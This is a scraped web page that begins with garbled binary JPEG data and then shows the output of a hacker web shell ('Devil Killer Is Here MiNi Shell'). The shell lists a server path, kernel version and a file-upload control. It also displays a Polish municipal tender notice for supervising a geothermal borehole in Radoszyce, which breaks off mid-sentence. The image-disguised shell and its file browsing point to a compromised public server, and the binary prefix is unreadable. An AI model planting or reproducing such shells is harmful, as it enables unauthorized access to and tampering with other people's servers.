JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250430/0021302001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Pełnienie funkcji Inżyniera Kontaktu w zakresie doradztwa, nadzoru i dozoru nad wykonaniem otworu poszukiwawczo-rozpoznawczego wód termalnych Radoszyce GT-1 w miejscowości Radoszyce” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Radoszyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291010620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żeromskiego 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radoszyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczme@radoszyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.radoszyce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Pełnienie funkcji Inżyniera Kontaktu w zakresie doradztwa, nadzoru i dozoru nad wykonaniem otworu poszukiwawczo-rozpoznawczego wód termalnych Radoszyce GT-1 w miejscowości Radoszyce” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2746ee22-a7db-44b5-97e2-45e4d50f5880</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00213020</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00076314/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Wykonanie otworu poszukiwawczo-rozpoznawczego wód termalnych Radoszyce GT-1 w miejscowości Radoszyce -</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://radoszyce.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://radoszyce.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Opisane w rozdziale XIII i XIV SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „Rozporządzenie”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Urząd Miasta i Gminy w Radoszycach, ul. Żeromskiego 28, 26-230 Radoszyce, tel. 41 373 50 83, e-mail: gmina@radoszyce.pl<br/>2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod adresem e-mail: inspektor@cbi24.pl.<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego. <br/>4. Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r.– Prawo zamówień publicznych (t.j. Dz. U. z 2023 r. poz. 1605), zwanej dalej PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami PZP.<br/>6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 4 PZP.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z PZP. <br/>8. Osoba, której dane dotyczą ma prawo do:<br/>a)	dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania, <br/>b)	w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesienia skargi do organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa,<br/>9. Osobie, której dane dotyczą nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>c)	na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych. <br/>10. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>11. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z PZP.<br/>12. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>13. W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do Administratora.<br/>14. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie żądania, o którym mowa w art. 18 ust. 1 Rozporządzenia, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu, Administrator nie udostępnia tych danych zawartych w protokole <br/>i w załącznikach do protokołu, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 Rozporządzenia.<br/>Pozostałe zapisy w rozdziale II SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W rozdziale II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BKŚ.271.8.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest pełnienie funkcji Inżyniera Kontraktu w zakresie doradztwa, nadzoru i dozoru nad wykonaniem otworu poszukiwawczo-rozpoznawczego wód termalnych Radoszyce GT-1 w miejscowości Radoszyce. <br/>Pełnienie funkcji Inżyniera Kontraktu polega na: „Sprawowaniu nadzoru i dozoru geologicznego podczas wykonywania prac i robót określonych w „Projekcie robót geologicznych na wykonanie otworu poszukiwawczo – rozpoznawczego wód termalnych Radoszyce GT-1 w miejscowości Radoszyce. Projektowany otwór Radoszyce GT-1 zlokalizowany jest w miejscowości Radoszyce, gmina Radoszyce, pow. konecki, woj. świętokrzyskie, na działce nr ewidencyjny 4581/3, obręb 0025 Radoszyce, położonej w centralnej części gminy, której właścicielem jest Gmina Radoszyce.<br/>2.	W zakres zamówienia wchodzi m.in.:<br/>1.	Sprawowanie nadzoru i dozoru inwestorskiego podczas wszelkich prac i robót określonych w Projekcie robót geologicznych na wykonanie otworu poszukiwawczo – rozpoznawczego wód termalnych Radoszyce GT-1 w miejscowości Radoszyce. <br/>2.	Sprawowanie dozoru geologicznego podczas wykonywania wszelkich prac i robót określonych w Projekcie robót geologicznych na wykonanie otworu poszukiwawczo – rozpoznawczego wód termalnych Radoszyce GT-1 w miejscowości Radoszyce oraz wynikających z modyfikacji wprowadzonych przez nadzór geologiczny wraz z przekazywaniem nadzorowi geologicznemu wszelkich bieżących informacji o aktualnej sytuacji w otworze, opracowanie raportów dobowych dokumentujących wykonanie otworu geotermalnego.<br/>3.	Opracowanie dokumentacji geologicznej z wykonania otworu geotermalnego.<br/>4.	Stałe uczestnictwo w naradach technicznych organizowanych przez wszystkie strony procesu inwestycyjnego.<br/>5.	Bieżące informowanie Zamawiającego o postępie robót na budowie, ewentualnych trudnościach w jego realizacji i możliwych do wystąpienia zagrożeniach. <br/>6.	Miesięczne raportowanie postępu prac – raport, dokumentacja fotograficzna. <br/>7.	Bieżąca współpraca z Zamawiającym i Wykonawcą wierceń w trakcie realizacji prac wiertniczych oraz wsparcie merytoryczne przy rozstrzyganiu trudności natury technicznej i organizacyjnej.<br/>8.	Sprawowanie nadzoru wiertniczego nad Wykonawcą otworu geotermalnego w trakcie realizacji prac wiertniczych w tym między innymi:<br/>a. doradztwo w sprawach dotyczących konstrukcji odwiertu,<br/>b. nadzorowanie, doradztwo i udział w podejmowaniu decyzji odnośnie prowadzenia wszelkich prac wiertniczych w odwiercie, w tym zwłaszcza wydawanie poleceń odnoszących się do metody, technologii i efektywności prowadzonych prac zgodnie z obowiązującymi przepisami i przyjętymi w branży standardami postępowania,<br/>c. przygotowanie prognoz odnośnie potrzeb w zakresie sprzętu i personelu oraz pomoc przy zamawianiu niezbędnych usług,<br/>d. kontrolowanie postępu poszczególnych faz prac na odwiercie oraz zgodności z założonym harmonogramem prac,<br/>e. opiniowanie i doradztwo w zakresie rozwiązywana problemów technicznych wynikłych w trakcie wykonywanych prac,<br/>f. nadzorowanie wykonywania prac serwisów zaangażowanych przy robotach wiertniczych,<br/>g. nadzorowanie bezpieczeństwa stosowania substancji i preparatów chemicznych na terenie objętym robotami,<br/>h. współpraca z innymi organami nadzoru, właściwymi miejscowo z Zamawiającym.<br/>9.	Badania laboratoryjne – wykonanie fizyko-chemicznych laboratoryjnych badań prób w zakresie nie mniejszym niż zawarty w Projekcie Robót Geologicznych na wykonanie otworu poszukiwawczo-rozpoznawczego Radoszyce GT-1 w miejscowości Radoszyce, między innymi:<br/>a.	badań próbek okruchowych i rdzeni <br/>b.	badań próbek wody termalnej i ich właściwości fizyko-chemicznych <br/>c.	ustalenia składu gazu złożowego<br/>10.	Opracowanie i zatwierdzenie dokumentacji hydrogeologicznej w zakresie nie mniejszym niż zawarty w Projekcie Robót Geologicznych na wykonanie otworu poszukiwawczo-rozpoznawczego Radoszyce GT-1 w miejscowości Radoszyce:<br/>a. opracowanie dokumentacji hydrogeologicznej ustalającej zasoby eksploatacyjne wód termalnych wraz z uczestnictwem w procedurze zatwierdzania tej dokumentacji hydrogeologicznej, aż do uzyskania decyzji właściwego organu administracji geologicznej zatwierdzającej dokumentację,<br/>b. przekazanie Zamawiającemu zatwierdzonej przez Marszałka Województwa Świętokrzyskiego dokumentacji hydrogeologicznej w wymaganej ilości i formie po zakończeniu przedsięwzięcia lub potwierdzenie przekazania Marszałkowi Województwa Świętokrzyskiego dokumentacji geologicznej sporządzonej w przypadku prac geologicznych niekończących się udokumentowaniem zasób geotermalnych lub, jeśli dotyczy, potwierdzeniem przekazania innej dokumentacji geologicznej stosownym organom zgodnie z ustawą Prawo górnicze. <br/>11.	Współpraca z Zamawiającym w przygotowaniu rozliczenia inwestycji w NFOŚiGW poprzez przygotowywanie wniosków o wypłatę środków zgodnie z Umową o dofinansowanie Projektu oraz przygotowywanie sprawozdań i dokumentów rozliczeniowych potwierdzających prawidłowość realizacji robót wiertniczych według harmonogramu uzgodnionego z NFOŚiGW i osiągnięcia efektu rzeczowego zgodnego z Umową o dofinansowaniu Projektu.<br/>12.	Zobowiązanie do udziału w naradach koordynacyjnych, jeśli zaistnieje konieczność ich zwoływania, w terminach uzgodnionych wspólnie z Zamawiającym oraz do prezentacji postępu prac na każde wezwanie Zamawiającego. <br/>13.	Sporządzenie i zatwierdzenie w Urzędzie Marszałkowskim województwa świętokrzyskiego dodatku do projektu robót geologicznych uwzględniającego wykonanie badań production log oraz projektu robót geologicznych likwidacji otworu Radoszyce GT-1. <br/>3.	Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 9 do SWZ zaś sposób realizacji przedmiotu zamówienia znajduje się w istotnych postanowieniach umowy wzór umowy (załącznik nr 8 d SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71300000-1 - Usługi inżynieryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71351220-1 - Geologiczne usługi doradcze</p> <p class="mb-0">71351910-5 - Usługi geologiczne</p> <p class="mb-0">76470000-8 - Usługi badania odwiertów</p> <p class="mb-0">71355200-3 - Wykonywanie badań</p> <p class="mb-0">85312300-2 - Usługi dozoru i doradztwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert <br/>1)	Cena (C) – waga kryterium 60 %<br/>2)	Doświadczenie zespołu (DZ) – waga kryterium 40% <br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	Cena (C) – waga 60% do obliczeń przyjęta zostanie cena brutto za całość zamówienia podana w formularzu ofertowym. Punkty zostaną wyliczone według wzoru:<br/>cena najniższa brutto*<br/>C = ------------------------------------------------ x 60pkt<br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>W kryterium cena Wykonawca może otrzymać maksymalnie 60 pkt. <br/>2)	Doświadczenie zespołu (DZ) – waga kryterium 40%<br/>Za doświadczenie zespołu zamawiający rozumie doświadczenie zespołu zaangażowanego w realizację przedmiotu zamówienia <br/>W ramach niniejszego kryterium ocena ofert będzie dokonana w oparciu o złożony przez Wykonawcę wykaz osób – załącznik do Formularza Ofertowego 1A, które będą zaangażowane w wykonanie zamówienia z uwzględnieniem ilości wykonanych przez każdą z tych osób usług sprawowania (pełnienia) nadzoru lub dozoru geologicznego podczas wykonywania (wiercenia) otworu geotermalnego o głębokości minimum 1000 m p.p.t. <br/>Punktacji będą podlegać osoby pełniące funkcje: Kierownika Kontraktu, Nadzoru Geologicznego i Dozoru geologicznego.<br/>a)	Doświadczenie zespołu zaangażowanego w realizację przedmiotu zamówienia -Doświadczenie Kierownika kontraktu (DKP) - 20% <br/>b)	Doświadczenie zespołu zaangażowanego w realizację przedmiotu zamówienia - Doświadczenie Nadzoru Geologicznego (DNG) - 10% <br/>c)	Doświadczenie zespołu zaangażowanego w realizację przedmiotu zamówienia - Doświadczenie Kierownika Dozoru Geologicznego (DDG) - 10%<br/><br/>Zasady przyznawania punktów w kryterium Doświadczenie Zespołu <br/>Doświadczenie Kierownika Kontraktu (DKK). <br/>Liczba punktów zostanie przyznana w tym kryterium na podstawie zadeklarowanej przez Wykonawcę ilości zatwierdzonej dokumentacji hydrogeologicznej dla otworów geotermalnych o głębokości minimum 1000 m p.p.t w sporządzeniu jakich wskazana osoba brała udział: <br/>- udział w sporządzaniu 1 zatwierdzonej dokumentacji hydrogeologicznej - 0 pkt. <br/>- udział w sporządzaniu 2 i więcej zatwierdzonych dokumentacji hydrogeologicznych - 20 pkt (max liczba punktów).<br/>Doświadczenie Nadzoru Geologicznego (DNG). <br/>Liczba punktów zostanie przyznana w tym kryterium na podstawie zadeklarowanej przez Wykonawcę ilości sprawowanych nadzorów geologicznych podczas wiercenia otworów geotermalnych o głębokości minimum 1000 m p.p.t. oraz sporządzeniu dla tych otworów zatwierdzonej dokumentacji hydrogeologicznej realizowanym przez wskazaną osobę: <br/>- 1 nadzór geologiczny i zatwierdzona dokumentacja hydrogeologiczna - 0 pkt. <br/>- 2 i więcej nadzory geologiczne i zatwierdzone dokumentacje hydrogeologiczne - 10 pkt (max liczba punktów).<br/>Doświadczenie Dozoru Geologicznego (DDG). <br/>Liczba punktów zostanie przyznana w tym kryterium na podstawie zadeklarowanej przez Wykonawcę ilości sprawowanych dozorów geologicznych podczas wiercenia otworów geotermalnych o głębokości minimum 1000 m p.p.t. przez wskazaną osobę: <br/>- 1 dozór geologiczny - 0 pkt. <br/>- 2 i więcej dozory geologiczne - 10 pkt (max liczba punktów).<br/><br/>Ocena = C + DKK + DNG + DDG, <br/>gdzie: <br/>C - liczba punktów dla kryterium cena <br/>DKK - liczba punktów uzyskana w kryterium „Doświadczenie Kierownika Kontraktu” <br/>DNG - liczba punktów uzyskana w kryterium „Doświadczenie Nadzoru Geologicznego” <br/>DDG – liczba punktów uzyskana w kryterium „Doświadczenie Dozoru Geologicznego”<br/>Pozostałe zapisy w rozdziale XIX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zespołu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek zostanie spełniony, jeśli Wykonawca:<br/>a)	wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 1 usługę, która obejmowała swym zakresem pełnienie funkcji kierownika kontraktu lub nadzoru i dozoru geologicznego w trakcie realizacji prac wiertniczych, których celem było wykonanie co najmniej 1 otworu geotermalnego o głębokości nie mniej niż 1000 m p.p.t., badań laboratoryjnych oraz została wykonana i zatwierdzona do tego otworu dokumentacja hydrogeologiczna <br/><br/>Przez jedną usługę należy rozumieć wykonanie usługi na rzecz jednego zleceniodawcy na podstawie jednej umowy.<br/><br/>b)	wykaże, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w realizacji zamówienia tj. <br/>1)	jedną osobą pełniącą funkcję kierownika kontraktu, która pełniła funkcję kierownika kontraktu/projektu podczas wiercenia minimum 1 otworu geotermalnego o głębokości minimum 1000 m p.p.t oraz brała udział (jest wymieniona w spisie autorów) przy sporządzaniu zatwierdzonej dokumentacji hydrogeologicznych dla tego otworu,<br/>2)	jedną osobą 